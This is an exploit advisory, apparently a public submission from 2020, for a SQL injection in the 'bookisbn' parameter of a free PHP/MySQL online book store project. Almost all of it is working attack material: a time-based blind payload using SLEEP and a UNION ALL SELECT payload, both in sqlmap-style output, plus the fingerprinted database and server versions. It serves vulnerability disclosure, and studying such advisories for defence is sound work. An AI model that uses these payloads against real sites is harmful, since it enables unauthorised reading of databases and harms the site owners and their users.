====================================================================
Online Book Store project in PHP Mysql -  SQL injection
====================================================================
####################################################################
.:. Author         : Yussef Dajdaj
.:. Contact        :
.:. Vendor         : https://projectworlds.in/
.:. Script          : https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
.:. Date:           : 8/8/2020
.:. Tested on:   : Tested on: Window 10 64 bit environment || XAMPP
####################################################################

===[ Exploit ]===

[*] SQL injection
=================================

https://localhost/testing/book.php?bookisbn='[injection<https://localhost/testing/book.php?bookisbn='%5binjection>]

Parameter: bookisbn (GET)

    Type: time-based blind
    Payload: bookisbn=978-1-1180-2669-4' AND (SELECT 6407 FROM (SELECT(SLEEP(5)))AXNT) AND 'uTiZ'='uTiZ

    Type: UNION query
     Payload: bookisbn=-5816' UNION ALL SELECT CONCAT(0x716a707a71,0x6442504257556d676a596278427966694f7854544a677357556e615041477066714f4e51754c704e,0x7178766b71),NULL,NULL,NULL,NULL,NULL,NULL-- rHNm

the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43